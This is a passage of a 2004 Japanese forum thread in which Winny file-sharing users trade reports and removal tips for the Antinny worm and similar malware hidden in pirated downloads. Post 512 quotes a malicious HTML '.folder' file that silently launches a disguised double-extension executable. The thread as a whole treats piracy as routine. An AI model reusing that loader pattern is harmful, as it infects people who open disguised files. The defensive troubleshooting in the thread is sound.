375 :[名無し]さん(bin+cue).rar:04/02/19 08:42 ID:gKiqjp7D
>>374
ありゃzip.mp3は違うな。

376 :[名無し]さん(bin+cue).rar:04/02/19 09:22 ID:WBdGv1nZ
http://thumb.fingers.co.za/~nic/gallery/ineye.jpg

377 :[名無し]さん(bin+cue).rar:04/02/19 13:08 ID:F6R9vsr7
ZONEのNEWアルバム、ウィルス入りばっかりじゃねーかよ(゚Д゚;)
今日やっとまともなの落とせた。
今まで7〜8ファイル落としたけど、13曲中、13個ウィルスだったりしたよ。

378 :[名無し]さん(bin+cue).rar:04/02/19 13:18 ID:xzUpZfvB
DLしたファイルをスキャン→ウイルス入り→WinRARでウイルスファイルだけ削除→(゚д゚)ウマー!!

こういうことしないの?


379 :[名無し]さん(bin+cue).rar:04/02/19 14:16 ID:iBrM7WiR
(C65)(同人誌)[JUMBO MAX]「カレイドスター すごいそらの本」
exe踏んでもうた……anntinyの症状は無しです。再起動後も問題なしです。
思い当たるウィルス、ワームがありましたら
何か他にやっておくべき行動をお教えください。

380 :[名無し]さん(bin+cue).rar:04/02/19 14:22 ID:CtztUXUt
きっとあなたの個人情報がネット上を彷徨っていることでしょう

381 :[名無し]さん(bin+cue).rar:04/02/19 15:17 ID:AGohs99e
>>379
ウイルススキャンしてからもう一度

382 :[名無し]さん(bin+cue).rar:04/02/19 16:10 ID:Ca+U53C0
>>369
拡張子変えてもlzhはlzh。
解凍して中にあるaviファイルだけ取り出せ、同梱のexe起動しなきゃ平気。
WinRARなんかだったら中身確認できるから安心かと思われ

383 :369:04/02/19 16:42 ID:CHOZN4nv
>373〜382さん*・゜(n‘∀‘)η゚・*: ありがとうございました☆RARを使えばよかったんだね!
382さん、374さんは絶対やさしい人だってわかります(*´ー`*)みんなありがとね☆

384 :[名無し]さん(bin+cue).rar:04/02/19 16:44 ID:VI9Kkrvp
初Antinny記念カキコ

(ROM) PC6001 GAME ROM(5).ZIP
6ba59414f6aff99e056329ffedc78e9a

AVG様々です

385 :[名無し]さん(bin+cue).rar:04/02/19 17:08 ID:IMhHeuvs
>>383
「優しい」というのと「甘い」というのは違います。
拡張子とファイルの関係すら把握していないレベルで
P2Pに手を出すのは大変危険です。
今のあなたは、幼稚園児がチェーンソーを振り回しているようなもの。
それでも続けるというのであれば、止めはしませんが、
最終的には全て自分で責任を負わなければいけないということだけは覚えておいてください。


386 :[名無し]さん(bin+cue).rar:04/02/19 17:13 ID:qzEs0Jr6
 

387 :[名無し]さん(bin+cue).rar:04/02/19 17:49 ID:gCJvXQkA
Winny起動したらエラーで起動できなくてファイルがいっぱい増えました
(null)Noderefとか

ヤバイですか?

388 :[名無し]さん(bin+cue).rar:04/02/19 17:54 ID:LiGGwJub
>>387
平気。みんなこいつにこれ以上レスしないようにな。

389 :[名無し]さん(bin+cue).rar:04/02/19 17:56 ID:gCJvXQkA
>>388
ありがとう

390 :[名無し]さん(bin+cue).rar:04/02/19 18:07 ID:LiGGwJub
こういう風にいわれるとちょっとだけ本当のことを教えたくなるな・・・

391 :[名無し]さん(bin+cue).rar:04/02/19 19:38 ID:RQaH0854
一度WINNYで落としたファイルでウィルスに感染してしまって
その後スキャンかけてウィルスは削除したんですが
それ以降WINNYを使っていると勝手に再起動するようになってしまいました。
WINNY以外の時は平気です。ウィルスが原因だったのかわかりませんが
解決方法を教えてください。

392 :[名無し]さん(bin+cue).rar:04/02/19 19:44 ID:z/0QDWcr
NT用のMS-config
http://pwmzk.hp.infoseek.co.jp/files/msconfig.zip

393 :[名無し]さん(bin+cue).rar:04/02/19 20:10 ID:zCy8vXv5
>>203
俺も同じのにかかった・・・。外付HDも逝ってまった。
[18禁ゲーム](040213)放課後 〜濡れた制服〜 Disc1+2(α補修+NOCD化済)ccd+rr5%.rar
とりあえず、無視リストに入れておく・・・

394 :[名無し]さん(bin+cue).rar:04/02/19 22:23 ID:fu42iQ2u
Explzhも圧縮ファイルの中身見れて便利だよね

395 :[名無し]さん(bin+cue).rar:04/02/20 00:06 ID:F6BNuvC0
>>394
シェアはキライです

396 :[名無し]さん(bin+cue).rar:04/02/20 00:18 ID:2n1oa8JI
Upフォルダは作成されてなくてc:\windows\win.iniで
チェックしたらぬるぽの文字があったんだが、どういうことですか?

397 :[名無し]さん(bin+cue).rar:04/02/20 00:21 ID:qT1Py9qV
>>396
おめでとうございます。あなたは亜種に感染しました。

398 :[名無し]さん(bin+cue).rar:04/02/20 00:53 ID:MSiUeyvl
>>267のバックアップするソフトを拾ったけど
尻が通らないのしか流れてないよ
助けて!!

399 :[名無し]さん(bin+cue).rar:04/02/20 01:02 ID:YL2VOctk
>>365
>突然パソコンの画面が青くなり、その後すぐ再起動してしまいます。
DOS攻撃されたかもしれないです。

>>391
完全にウイルスが削除されていないのでは?
もう一度やってみましょう。

400 :[名無し]さん(bin+cue).rar:04/02/20 01:14 ID:YL2VOctk
テキストファイルのアイコンのexeファイル(ウイルス)が、Antinny.Eとしてノートンに検出されるようになりました。既出でしょうか。

401 :[名無し]さん(bin+cue).rar:04/02/20 01:46 ID:wRXxeeVb
age

402 :[名無し]さん(bin+cue).rar:04/02/20 03:32 ID:IpjQItlW
>>358
亀でスマンが、俺はキャッシュに使うドライブ(仮にEドライブ)に、
nyをインストして置いて、それとは別にダミーで起動ドライブにもインストしている。
通常Eドライブのnyを使って、起動ドライブの方は使わない。

一度antinnyに感染した時、起動ドライブの方に感染したので
全然被害を受けなかった。
実験と言うわけでは無いけれど、こう言う事もあります。

403 :[名無し]さん(bin+cue).rar:04/02/20 09:19 ID:dhGTjhnM
win.iniに嘘のパス書いておけばいいだけでは?

404 :[名無し]さん(bin+cue).rar:04/02/20 10:31 ID:ICx5+Cxf
>>400

http://www.symantec.com/avcenter/venc/data/w32.hllw.antinny.e.html

405 :[名無し]さん(bin+cue).rar:04/02/20 10:41 ID:UZ3fG9We
質問してよろしいですか?
映画のaviファイルがいつのまにか、exeファイルになっているのですが。
そして見れなくなっています。
スキャンしても何もでてこないのですが。
こんなウイルスあります?
極窓で見てもexeになってる・・・・


406 :[名無し]さん(bin+cue).rar:04/02/20 10:46 ID:qT1Py9qV
>>405
今のところ、聞いた事ない
シマンテックやトレンドマイクロにサンプルを提出して調べてもらうと良いと思う

映画以外にも、例えばjpegやテキストファイルでもexeに変わってしまうの?
だとしたら、どこかのUPローダーにでも上げてもらえればチェックしてみたい

407 :[名無し]さん(bin+cue).rar:04/02/20 10:51 ID:+Nuathbv
>>405
(・∀・)/☆カエレ!カエレ!

408 :[名無し]さん(bin+cue).rar:04/02/20 10:55 ID:UZ3fG9We
>>406
avi,vob,mpgがですね。
jpgはないです。
被害は映画とPVぐらいです。アップできるといいのですが。
今とりあえず再インストールしているので。。。。


409 :[名無し]さん(bin+cue).rar:04/02/20 10:57 ID:UZ3fG9We
>>407
おまえがカエレ!

410 :405です。:04/02/20 11:01 ID:UZ3fG9We
あっ!以前
>>16のような物に引っかかった・・覚えが・・・
俺がクリックしたのではなく身内が勝手に実行した・・・・
。・゜・(ノД‘)・゜・。

411 :[名無し]さん(bin+cue).rar:04/02/20 11:06 ID:dhGTjhnM
>>410
(・∀・)/☆カエレ!カエレ!

412 :[名無し]さん(bin+cue).rar:04/02/20 11:08 ID:eb0w64Z7
>>410
ユーザーアカウントで触らせるな
それに.exeは無視リスト入れとけよ

413 :[名無し]さん(bin+cue).rar:04/02/20 11:14 ID:UZ3fG9We
>>412
ユーザーアカウントで触らせるな?
?どのようにすればいいの?
exeは勝手に落とされ実行されてた・・・・

414 :[名無し]さん(bin+cue).rar:04/02/20 11:16 ID:+Nuathbv
>>413
バカは(・∀・)/☆カエレ!カエレ!



415 :[名無し]さん(bin+cue).rar:04/02/20 11:16 ID:zGaRGyFH
>>7を入れとけ、この童貞ヤロウが

416 :[名無し]さん(bin+cue).rar:04/02/20 11:22 ID:UZ3fG9We
>>415
入れときました。

417 :[名無し]さん(bin+cue).rar:04/02/20 11:22 ID:+Nuathbv
>>416
(・∀・)/☆チンチン

418 :[名無し]さん(bin+cue).rar:04/02/20 12:12 ID:ldkGGXiN
>>408
再インストールしても設定がそのまま残ってしまうので
クリーンインストを・・・・
まぁそんなことしなくても、ぐぐればいいだけの話だが



419 :[名無し]さん(bin+cue).rar:04/02/20 12:14 ID:ldkGGXiN
>>418
キーワードはぬるぽん
ぐぐってみそ!!


420 :[名無し]さん(bin+cue).rar:04/02/20 12:39 ID:/nD/VKz/
ログ情報の所にアップファイルフォルダ読み込み失敗ってあったらアップファイルフォルダは作られてないってことでいいの?
それと、アップファイルフォルダってアンチニーに作られる時ってどこに作られるんですか?

421 :[名無し]さん(bin+cue).rar:04/02/20 13:06 ID:pGJIPQn6
アンチニーの削除は手順通り完了したんですが
ダウン数が2に固定されてしまったようです。
これってデフォの症状ですか?
ちなみにポートはばっちり空けてます。

422 :[名無し]さん(bin+cue).rar:04/02/20 13:28 ID:GfOeLWDh
ガイシュツかもだけど、みんな無視ワードにjpgのサイズ9,152入れてる?

423 :[名無し]さん(bin+cue).rar:04/02/20 13:30 ID:GfOeLWDh
あ、既にありました。スマソ

424 :[名無し]さん(bin+cue).rar:04/02/20 13:36 ID:JEviRGXW
jpg自体無視にしてるから関係ない

425 :[名無し]さん(bin+cue).rar:04/02/20 13:39 ID:GfOeLWDh
>>424
それにしとく。

426 :[名無し]さん(bin+cue).rar:04/02/20 14:20 ID:f4BELgMT
jpgを無視ワードにするとゲームのマニュアルが引っかからなくなるから使えない

gca,exe,lzhで十分

427 :[名無し]さん(bin+cue).rar:04/02/20 15:24 ID:CU6PMIZM
>>426
無視ワードを「.jpg」にしとけば引っかかるだろ。

428 :[名無し]さん(bin+cue).rar:04/02/20 15:29 ID:f4BELgMT
>>427

【一般ゲーム】*** マニュアル( .jpg).zipってのがたまにある

429 :[名無し]さん(bin+cue).rar:04/02/20 15:31 ID:+Nuathbv
>>428
我慢汁!

430 :[名無し]さん(bin+cue).rar:04/02/20 15:58 ID:/nD/VKz/
420に答えて

431 :[名無し]さん(bin+cue).rar:04/02/20 16:00 ID:QPFzbSIS
http://www.google.co.jp/

432 :[名無し]さん(bin+cue).rar:04/02/20 16:48 ID:MovjkUE3
>>420
読み込みに失敗しただけでどこかに作られている。HDDが一部壊れているので、できれば取り替えたほうがよい。
アップファイルフォルダは、マイドキュメントに作られる。更にその中に自己の複製を作る(=他のみんなにばら撒く)。気をつけろ。

433 :[名無し]さん(bin+cue).rar:04/02/20 17:24 ID:ldkGGXiN
て、ゆうかレジストリなおしとけよ
最近のぬるぽは進化していてレジストリ操作ができなくしてあったり
復元操作ができなくなるよ。
再インストしても設定がひきつがれてしまうので
進化版ぬるぽにかかったらクリーンインストしたほうが無難。


434 :[名無し]さん(bin+cue).rar:04/02/20 17:43 ID:+Nuathbv
ぬるぽにかかってもwinnyできなくなるだけ?

435 :[名無し]さん(bin+cue).rar:04/02/20 17:52 ID:MovjkUE3
>>434
以前時限whiterまで仕組まれてたってのがあったな。何日かたった後、起動したらHDDのファイル消されまくったって。

436 :[名無し]さん(bin+cue).rar:04/02/20 18:36 ID:I9XVZ6cw
whiterはシャレにならないから、
>>6のダミーファイルを作ってる。
あとは、DLしたのをスキャンでウイルス発見したら削除と
オートランは窓使いの友で必要な時だけオフにしてる罠

437 :[名無し]さん(bin+cue).rar:04/02/20 18:41 ID:MHgNDeRB
包茎でもできる! 性交のような感覚のオナニー法!!

↑こいつをダチに送られてなんだろうとおもって開いて、
くだらねって思って、削除しようとしたら「アクセスを拒否されました」
とかでてさ、いろいろ試したけど結局消えないのよ。
テキストやら、Dosやら、Winnyの消えないファイルを消すソフトとか
試したけど、全然効かないんだよね。
どうすりゃいいんだよヽ(`Д´)ノウワァァァン

438 :[名無し]さん(bin+cue).rar:04/02/20 18:43 ID:wARGc9oC
http://www.google.co.jp/


439 :[名無し]さん(bin+cue).rar:04/02/20 19:00 ID:2vlP7D+Y
新種?
ttp://www.symantec.co.jp/region/jp/sarcj/data/w/w32.hllw.antinny.e.html

440 :[名無し]さん(bin+cue).rar:04/02/20 19:03 ID:qT1Py9qV
>>439
亜種

441 :[名無し]さん(bin+cue).rar:04/02/20 19:07 ID:MHgNDeRB
もうCドライブへの移動ができないし、フォルダ名も変えれないし・・・
ヽ(`Д´)ノウワァァァン
Cドライブにうつせれば、フォーマットしたら終わりなんだが、
よりによって入ってるのは50G使用中のドライブだからなぁ・・・

442 :[名無し]さん(bin+cue).rar:04/02/20 19:19 ID:JAV1D+FB
質問です。
winrar等で圧縮されたファイルの中を見ることが可能ですが、
見ただけでウィルスに感染する可能性はあるのでしょうか?

443 :[名無し]さん(bin+cue).rar:04/02/20 19:23 ID:JEviRGXW
>>442
現状では聞いたことがないけど、理論的に可能性ゼロではありません。
解凍ルーチン自体にバッファオーバーフロー等の弱点がもしあれば、
そこを突くウイルスが作成されるかもしれません。

444 :442:04/02/20 19:30 ID:JAV1D+FB
>>443
ご回答ありがとうございます。
今まではこの方法で大丈夫でしたが、今後はどうなることやら。

445 :[名無し]さん(bin+cue).rar:04/02/20 19:36 ID:F6BNuvC0
なぁ、Whismng.exeというダミーファイルってフォルダも作るのか?
ググったら、ファイルだけなら上書きされて意味がないとか、どうとかで
どっちなんだ?

446 :[名無し]さん(bin+cue).rar:04/02/20 19:54 ID:MovjkUE3
>>441
mame2

447 :[名無し]さん(bin+cue).rar:04/02/20 20:09 ID:MHgNDeRB
どうすんだよこいつ↓
包茎でもできる! 性交のような感覚のオナニー法!!

学生は誰かやってるだろうな・・・とみていて思った。

448 :[名無し]さん(bin+cue).rar:04/02/20 20:15 ID:I9XVZ6cw
>>445
実験したらWhismng.exeフォルダ作成すると、
Whismng.exeをC:\Windows\Systemに置けない。
なので、Whismng.exeフォルダ作成がベターだと思う。
あとここのVBSチェッカー使うのもいい。
http://mxtrojan.at.infoseek.co.jp/column02.html

449 :[名無し]さん(bin+cue).rar:04/02/20 20:26 ID:EjLsYCPP
WIN2Kのバヤイは?

450 :[名無し]さん(bin+cue).rar:04/02/20 20:30 ID:ZaPWmVm5
以前から疑問に思っていたんだが、

[ハッシュリスト]なんたら.exe

っていう1〜2MBくらいのファイル。あれはいったいなんなの?
いや、「自分で落として実行してみろ!」
とかって返されるのはわかってんだけど、それでも聞いてみたかったので聞いてみた。

451 :[名無し]さん(bin+cue).rar:04/02/20 20:34 ID:qT1Py9qV
リストがexeファイルなワケないだろ
確認するまでも無い

452 :[名無し]さん(bin+cue).rar:04/02/20 20:43 ID:F6BNuvC0
>>448
d

453 :[名無し]さん(bin+cue).rar:04/02/20 20:57 ID:ZaPWmVm5
自己解凍書庫?にしてはサイズ大きいし
自動でダウンリストに追加してくれるようなやつでもあるのか?
ウィルスの類?だとしても噂聞かないしなぁ

と色々考えていたわけで。
別にハッシュリストが欲しいわけではなく、
単に「いったいあれは何なのかが知りたい」というだけ。

とりあえず、やっぱり自分で落として中身覗いてみることにする。








初めからそうしろよw

454 :[名無し]さん(bin+cue).rar:04/02/20 21:23 ID:ZaPWmVm5
わはははははは、
なんだ、そういうことか。
テキストアイコンのAntinnyであったのか。

455 :[名無し]さん(bin+cue).rar:04/02/20 21:30 ID:KvozMOQV
>>445
実験してみればいいよ
CドライブとDドライブにテキストファイル test.txt を作ってファイルを移動させるとC→DとD→Cは上書きされる
けど、Cにテキストファイル test.txt を作ってDにフォルダ test.txt を作ると「上書きされません」ってエラーが出る
>>6の奴は「Whismng.exe」というダミー『フォルダ』のことを言いたいんだろ

456 :[名無し]さん(bin+cue).rar:04/02/20 21:36 ID:JEviRGXW
>>455
先に同名のフォルダが存在すると、ファイルが作成できないって奴か・・
それを利用してウイルスファイルをコピーされないようにするわけだね

457 :98SE :04/02/20 21:54 ID:T69N+p3T
>>456
勉強になった

458 :[名無し]さん(bin+cue).rar:04/02/20 21:58 ID:MovjkUE3
だからmame2で削除しろってヴァカども

459 :[名無し]さん(bin+cue).rar:04/02/20 22:23 ID:i+qCTKx3
初歩の初歩で悪いが、
>>22でレジストリエディタが開かないんだが・・・・
WIN98SEだが・・・・

どなたか・・・・・_| ̄|○


460 :[名無し]さん(bin+cue).rar:04/02/20 22:29 ID:ldkGGXiN
>>459
新種のぬるぽにかかったな
クリーンインスト。


461 :[名無し]さん(bin+cue).rar:04/02/20 22:32 ID:i+qCTKx3
>>460
まじっすか?
HDDのデータは無傷なんだが・・・・

462 :[名無し]さん(bin+cue).rar:04/02/20 22:33 ID:i+qCTKx3
キャッシュは消えちまったが、全然痛くない程度

463 :[名無し]さん(bin+cue).rar:04/02/20 22:36 ID:+pHeglca
マウスポインタが起動時に
「機嫌がいいので飛び跳ねますね」ってっ出て
ぴょんぴょん飛び跳ねるんだけど?
なにこれ?
ウイルスは検知しなかったんだけど

464 :[名無し]さん(bin+cue).rar:04/02/20 22:36 ID:dvM+/JW0
>459
窓の手でレジストリエディタへのアクセスが禁止になっていないか調べろ。

465 :[名無し]さん(bin+cue).rar:04/02/20 22:37 ID:qT1Py9qV
>>463
なにそれ!見て〜!

466 :[名無し]さん(bin+cue).rar:04/02/20 22:38 ID:f4BELgMT
>>463

ワラタ そのウィルスくれ。

467 :459:04/02/20 22:40 ID:i+qCTKx3
>>464
ありがとうございます!調べてみます!

468 :[名無し]さん(bin+cue).rar:04/02/20 22:44 ID:+pHeglca
右クリですぐとまるし実害まったくないんだけど(多分)
得ろ下いくつか動作確認したら、なった。
付属品かとおもったけど
全部アンインスコして、プログラムファイルの残骸も全部消したけどたけどだめ。

チョット カワ(・∀・)イイ!!

469 :[名無し]さん(bin+cue).rar:04/02/20 22:45 ID:+pHeglca
たけどだめ?修正

470 :459:04/02/20 22:47 ID:i+qCTKx3
レジストリ エディタが開きません。

471 :[名無し]さん(bin+cue).rar:04/02/20 22:49 ID:wiys/3cW
>>341
最近ウイルス対策を怠ってたら俺も引っかかったよ<放課後
でもまあバックアップ関係はそこそこやってたので
Cドライブが二週間前、その他がファイナルデータで全て復活できたので
たいした被害にはならなかったな。
何人か引っかかったやつも9割はデータ復旧できるだろうに
もう遅いかな

472 :[名無し]さん(bin+cue).rar:04/02/20 22:49 ID:F6BNuvC0
>>463
外出。どっかで解決方法も
見かけたことがあるからググれ。

473 :[名無し]さん(bin+cue).rar:04/02/20 22:51 ID:+pHeglca
了解。
サンクス ノシ
もいっかい調べてみる。

でも、消すのはちょとおしいな

474 :[名無し]さん(bin+cue).rar:04/02/20 22:52 ID:JEviRGXW
>>470
.regをクリックしただけじゃレジストリエディタの画面そのものは出ないよ。
「〜レジストリに正しく入力されました」と出ればOK

もしレジストリエディタ自体を起動したいんなら
[スタート]→[ファイル名を指定して実行]で、「regedit」と入力すればOK

475 :[名無し]さん(bin+cue).rar:04/02/20 22:54 ID:Mqn6LNaE
遅せーよあほ

476 :[名無し]さん(bin+cue).rar:04/02/20 22:56 ID:JEviRGXW
>>475 誰?w

477 :[名無し]さん(bin+cue).rar:04/02/20 22:57 ID:Mqn6LNaE
オレだよ

478 :[名無し]さん(bin+cue).rar:04/02/20 22:59 ID:JEviRGXW
>>477 たろう?たろうかい?

479 :[名無し]さん(bin+cue).rar:04/02/20 22:59 ID:+pHeglca
>>463
ごめん、すぐ見つかった。
ただのジョークソフトみたいだね。
おもしろいから暫くそのまんまにしときます。


480 :[名無し]さん(bin+cue).rar:04/02/20 22:59 ID:Mqn6LNaE
ちげーよ馬鹿

481 :459:04/02/20 23:01 ID:i+qCTKx3
レジストリエディタ制限かけてねえのに!ひらかねえっだよ!

482 :[名無し]さん(bin+cue).rar:04/02/20 23:06 ID:aBvkaNRi
>>479
俺もそうやって放置してたら>>435だった。

483 :[名無し]さん(bin+cue).rar:04/02/20 23:13 ID:aBvkaNRi
[M]ってMX共有用って意味だってさ。某鯖で見てきた。サイズ同じだし、本物だね。

484 :459:04/02/20 23:18 ID:i+qCTKx3
あるがとうございました。無事駆除いたしますた。
二度とEXEファイルはダウソしません。
被害はキャッシュ全消失(全然痛くない。)

それでは。

485 :[名無し]さん(bin+cue).rar:04/02/20 23:24 ID:+pHeglca
マジ?(((( ;゚Д゚)))ガクガクブルブル

今からバイトだから、帰ってきてから再チェックしてみよ

486 :[名無し]さん(bin+cue).rar:04/02/20 23:40 ID:4xgvpvzR
>>437
俺もこいつにひっかかった。誰か教えてくれ〜〜!!


487 :[名無し]さん(bin+cue).rar:04/02/20 23:53 ID:dvM+/JW0
>486
セーフモードで試す。
txtファイルで上書きしてみる。
まめFile2を使ってみる。

488 :[名無し]さん(bin+cue).rar:04/02/21 00:00 ID:s5l5KnhH
ZONEのアルバムで圧縮ファイル形式は怪しいと思ったほうがいい。
かなりの確立でウイルスが検出される傾向!

489 :[名無し]さん(bin+cue).rar:04/02/21 00:19 ID:e+Chg18B
おれはマシンの使用者の名前が
winnyで違法ファイル集めてます
になっていて(確かにそのとおりなのだが)
どうしても修正できんので
クリインストした。


490 :400:04/02/21 00:21 ID:tiPuOo5a
>>404
ありがとうございました。

491 :[名無し]さん(bin+cue).rar:04/02/21 00:26 ID:6cH/Ad2z
ttp://www2.strangeworld.org/uedakara/sahra6138.jpg
ねえねえ、これって何さ?

492 :[名無し]さん(bin+cue).rar:04/02/21 00:31 ID:6Rr/dS7u
>>491
部落らでしょ。

493 :[名無し]さん(bin+cue).rar:04/02/21 00:31 ID:6Rr/dS7u
なんかID似ててびっくり。

494 :[名無し]さん(bin+cue).rar:04/02/21 00:36 ID:Ijq+cmYH
皆さんのアンチウィルスソフトは何使ってるの?(´・ω・`)

495 :[名無し]さん(bin+cue).rar:04/02/21 00:37 ID:Amp7Kk/d
>>494
ダブルバスターコレダー

496 :[名無し]さん(bin+cue).rar:04/02/21 00:38 ID:ydEThwO6
>494
AVG

497 :[名無し]さん(bin+cue).rar:04/02/21 00:40 ID:EBSIdPPE
>>494
マカフィー

498 :[名無し]さん(bin+cue).rar:04/02/21 00:45 ID:Zl2atzG5
>>494
eTrust

499 :[名無し]さん(bin+cue).rar:04/02/21 01:18 ID:MF3PvLM9
>>494
F-Secure

500 :[名無し]さん(bin+cue).rar:04/02/21 01:41 ID:kU6ppbQr
俺もかかった
レジストリ触れなくなったけど
Onlyone77F8_1.00.exeというソフト(ベクターとかでさがして)
で直った。

レジストリを触って使用者の部分も直せたが
再起動するとやはり「集めてます」なる。
さてはて

501 :[名無し]さん(bin+cue).rar:04/02/21 02:55 ID:nNx5WRhx
アイゴー!WORM_ANTINNY.A,かかったニダ

【合法】【壁紙】すいませんちょっとゲームですよ.png』をゲーム化しましたよver0.3.zip

502 :[名無し]さん(bin+cue).rar:04/02/21 03:12 ID:nNx5WRhx
復元機能・・・うっかり忘れてた。つーかウィルスもバックアップすんなマイ糞め

503 :[名無し]さん(bin+cue).rar:04/02/21 13:38 ID:ZMJE+VSg
クリックしちまったよ欝

504 :[名無し]さん(bin+cue).rar:04/02/21 16:02 ID:ziA9ahcd
Downフォルダを監視、実行ファイルは問答無用で隔離、
アーカイブだったら中に実行ファイルがあったら問答無用で隔離、
隔離したファイル一覧を元に無視リストを自動作成、
後はファイル名にしたがって分類するみたいなアプリを作ればいいのかな?
そうすれば、アプリやゲームを落とさない限り安全になるかと思う。
作ってみようか?

もしかして、既にある?

505 :[名無し]さん(bin+cue).rar:04/02/21 16:23 ID:MzgnwGAy
>>504
ないとおもう
おねがいしまう

506 :[名無し]さん(bin+cue).rar:04/02/21 17:19 ID:jNXypXvr
winny自体が消えた(;´Д`)

ウイルスは検出されないんだけどなー

507 :[名無し]さん(bin+cue).rar:04/02/21 18:49 ID:9nnMNNWo
普通にzipファイル落としたらanntinyが入ってました。
これって偽造?

508 :[名無し]さん(bin+cue).rar:04/02/21 19:03 ID:uTpB4oTs
>>507
意味わかんねーよ!
ウィルスが入ってようが入ってなかろうが本物が入ってれば本物だ
ウィルスが入ってた場合ウィルス混入の本物
違うファイルが入っていればウィルス入りだろうがウィルス入ってなかろうが偽造だ

509 :[名無し]さん(bin+cue).rar:04/02/21 19:04 ID:knLHXFmX
>>506.
当然ながら新種,亜種の場合、
まだ検知されていないだけの場合があります。
後はソフトが把握できていないウイルスもわらわらとあるので。
ウイルスが関係ないとは簡単には言えません。

>>507.
たいていはそうですね。
中には、本物のファイルの中にウイルスを混ぜている場合もあります。
その場合はウイルスを消せば、後は本物ファイルと変わりません。

510 :[名無し]さん(bin+cue).rar:04/02/21 20:52 ID:ziA9ahcd
>>507
anntinyを除けば本物と思われ。
ただ、anntinyが入っていない、ちょっとだけサイズの
小さい本物のアーカイブも流れているからそっちを落とせ。

511 :[名無し]さん(bin+cue).rar:04/02/21 21:31 ID:ZQJVprOD
ウイルスに感染している疑いのあるファイルを Symantec Security Response に提出する方法
ttp://service1.symantec.com/SUPPORT/INTER/entsecurityjapanesekb.nsf/jp_docid/20020624043939949

512 :[名無し]さん(bin+cue).rar:04/02/21 21:39 ID:D6MfAJpg
20040218_DREAMS COME TRUE_やさしいキスをして.zip ff36fd6870b5c3c60a44c6b69d156aeb
これに入ってる.txt.exeってanntiny?
.folderを実行しちまったんだが…
IEが開いたんであわてて閉じた。
エディタで開くとこんなん↓

<html><head><title></title><object CLASSID='CLSID:00000000-0000-0000-0000-FFF085324649' CODEBASE='Wiinny小技集[040105].txt.exe'>
</object><script>window.location = "./";</script></head><body></body></html>

これってWiinny小技集[040105].txt.exeを実行したのと同じこと?
再起動、システム復元したが今のトコ変わったことはなし。

513 :[名無し]さん(bin+cue).rar:04/02/21 22:32 ID:MF3PvLM9
>>512
NortonではAntinnyとは認識されなかったよ
Wiinny小技集[040105].txt.exeは実行する気ないので分からない。

514 :[名無し]さん(bin+cue).rar:04/02/21 22:49 ID:ziA9ahcd
>>512
とりあえず、.folderの関連付けを殺しておけ。
何の意味もなくてフォルダと見間違えるだけだから。

515 :[名無し]さん(bin+cue).rar:04/02/21 22:52 ID:lYmQQ1el
>>512
ほー、ようやく登場したか。

516 ::04/02/21 22:56 ID:JsgRj5M4
「使用者の名前がwinnyで違法ファイル集めてます」
俺もかかってよ、レジストリも開けなくなってたので
窓の手で制限解除して使用者の名前戻し、自動実行にあった不明な物を停止したら
再ログオン時直ったよ、自動実行ファイル名は特定しようとしたら
その都度新しいのができ変わるみたい。


517 :[名無し]さん(bin+cue).rar:04/02/21 23:24 ID:nMkMs1Cs
Antinnyの亜種
http://www.symantec.com/region/jp/sarcj/data/w/w32.hllw.antinny.e.html

518 :512:04/02/21 23:26 ID:D6MfAJpg
ttp://internet.watch.impress.co.jp/cda/news/2004/01/30/1927.html
これにひっかかったのね…
拡張子は表示させてたんだがなあ。
Antinny対策にフォルダのアイコンを変えてたのが仇になったな…

>>514
どうやんの?
htmlはDonutP(←スクリプトとか切ってある)に関連付いてたんだが、IE(←デフォ)が開いたぞ。

519 :[名無し]さん(bin+cue).rar:04/02/21 23:31 ID:lYmQQ1el
>>518 一ヶ月前に書いたんだが

対処法(Windows XPの人必須)

スタートメニューのファイル名を指定して実行に
regedit
と入れOKを押す。

左側のツリーの
HKEY_CLASSES_ROOT\.Folder
この.Folderを右クリックして削除。
そして再起動。

520 :[名無し]さん(bin+cue).rar:04/02/21 23:58 ID:e+Chg18B
>>519
新型は
regedit不能の罠


521 :[名無し]さん(bin+cue).rar:04/02/22 02:18 ID:4in6O0Kz
>>337
俺が落とした奴、404kだけどやばいのかな?
でも、デスクトップアイコンから起動しても何もなかったが。

522 :512:04/02/22 02:30 ID:AVmq4X6S
>>519
わざわざありがとうございます。
新型Antinnyではなかったようです。
AVG Freeでは二重拡張子のため、Hidden extension.exeと出て、修復してくれました。

C:\WINDOWS\Downloaded Program Files\Wiinny小技集[040105].txt.exe
ここにありました。

結局どんなウイルスかわからない…


523 :[名無し]さん(bin+cue).rar:04/02/22 10:05 ID:3AT8gyhW
Winnyを起動しても即閉じてしまうようになってしまったんですが
対処法などご存知な方おられませんでしょうか

524 :[名無し]さん(bin+cue).rar:04/02/22 11:57 ID:MUk2OStz
>>508-510
亀レスですがありがトン

525 :[名無し]さん(bin+cue).rar:04/02/22 12:10 ID:CtV60MWX
>>523
まずはOSや使用環境ほか思い当たることを書こうよ

526 :[名無し]さん(bin+cue).rar:04/02/22 12:18 ID:SPD/M/ke
女性ウイルス作者「ギガバイト」捕まる--「男には負けない」がアダに
ttp://japan.cnet.com/news/media/story/0,2000047715,20064367,00.htm

527 :523:04/02/22 12:49 ID:3AT8gyhW
>>525 さんすいません
おっしゃるとおりです。

WindowsXP HE
P4 2.26
512M
でして
起動しなくなる直前にやったことといえば....
GF4T14200 128のドライバを5.3.0.3に
落としたaviファイル(極窓で拡張子チェック済み)
の鑑賞ぐらいだとおもいます。
ウイルスに関してはAVGが常時走っております。


528 :[名無し]さん(bin+cue).rar:04/02/22 12:56 ID:gdKsUFPc
>>512のexeを解凍ソフトで開いてみるとZIP書庫が見えるぞ。



529 :[名無し]さん(bin+cue).rar:04/02/22 13:25 ID:BYGQhsP/
ところでPCゲームイメージファイルをデーモンに乗せると発動する
ウイルスとかってあったりするの?

530 :[名無し]さん(bin+cue).rar:04/02/22 14:53 ID:Oh8UZjSi
デーモンに乗せる
Autorunが起動
任意のファイル実行
ウィルス

ならあるだろう。

531 :[名無し]さん(bin+cue).rar:04/02/22 16:27 ID:a8x4JYTQ
Winnyを起動しようとすると、HDDに異常にアクセスするだけで起動せず
(タスクマネージャでは使用メモリが少ないのですが動いてる感じ)
また、キャッシュの整理しようとしただけでも同様の症状が出るのですが
これはウイルスでしょうか?

キャッシュを消せば元通りになったんですが
eTrustで確認しましたけど反応なし
何かが消えてるわけではなくて、気持ち悪くて・・・

532 :[名無し]さん(bin+cue).rar:04/02/22 16:49 ID:AOAisv1K
>>527
システム復元して、前のドライバでちゃんと動くのかぐらいは確認してるんだろうな。

